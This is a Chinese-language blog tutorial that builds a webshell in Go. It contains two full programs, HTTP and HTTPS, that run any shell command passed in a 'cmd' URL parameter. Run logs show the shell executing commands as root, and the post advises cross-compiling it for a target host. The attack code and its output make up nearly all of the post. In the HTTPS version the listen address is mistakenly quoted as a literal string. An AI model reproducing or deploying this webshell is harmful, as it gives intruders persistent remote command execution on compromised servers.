0x00 前言

在这篇文章中,我将记录一下如何使用Golang实现一个webshell。

0x01 HTTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package main

import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
if len(os.Args) != 2 {
fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
os.Exit(1)
}

http.HandleFunc("/", requestHandler)
log.Println("Listening for HTTP requests.")
err := http.ListenAndServe(os.Args[1], nil)
if err != nil {
log.Fatal("Error creating server. ", err)
}
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
// Get command to execute from GET query parameters
cmd := request.URL.Query().Get("cmd")
if cmd == "" {
fmt.Fprintln(
writer,
"No command provided. Example: /?cmd=whoami")
return
}

log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
fmt.Fprintf(writer, "You requested command: %s\n", cmd)

// Run the command
command := exec.Command(shell, shellArg, cmd)
output, err := command.Output()
if err != nil {
fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
}

// Write output of command to the response writer interface
fmt.Fprintf(writer, "Output: \n%s\n", output)
}

image

1
2
3
4
5
6
7
8
9
[email protected]:~/go/src/webshell$ go install webshell
[email protected]:~/go/src/webshell$ ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:05:55 Listening for HTTP requests.
2020/01/01 14:05:55 Error creating server. listen tcp 0.0.0.0:80: bind: permission denied
[email protected]:~/go/src/webshell$ sudo ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:06:00 Listening for HTTP requests.
2020/01/01 14:06:04 Request from 54.222.196.177:61772: ifconfig
^C
[email protected]:~/go/src/webshell$

image

0x02 HTTPS

注意把证书和私钥配上就可以走HTTPS了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
package main

import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
if len(os.Args) != 2 {
fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
os.Exit(1)
}

http.HandleFunc("/", requestHandler)
log.Println("Listening for HTTPS requests.")
err := http.ListenAndServeTLS(
"os.Args[1]",
"cert.pem",
"privateKey.pem",
nil,
)
if err != nil {
log.Fatal("Error creating server. ", err)
}
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
// Get command to execute from GET query parameters
cmd := request.URL.Query().Get("cmd")
if cmd == "" {
fmt.Fprintln(
writer,
"No command provided. Example: /?cmd=whoami")
return
}

log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
fmt.Fprintf(writer, "You requested command: %s\n", cmd)

// Run the command
command := exec.Command(shell, shellArg, cmd)
output, err := command.Output()
if err != nil {
fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
}

// Write output of command to the response writer interface
fmt.Fprintf(writer, "Output: \n%s\n", output)
}

image

1
2
3
4
[email protected]:~/go/src/httpswebshell$ curl 127.0.0.1:443/?cmd=id
You requested command: id
Output:
uid=0(root) gid=0(root) groups=0(root)

image

0x03 使用方法(交叉编译)

需要针对目标主机的类型,将其编译为对应的可执行文件。
本地测试命令:

1
2
sudo go run ~/go/src/httpswebshell/webshell.go 0.0.0.0:443
go install httpswebshell # 编译

0x04 后记

记录一下使用Golang实现webshell,走HTTP(S)。

0x05 参考文献

[1] Security with Go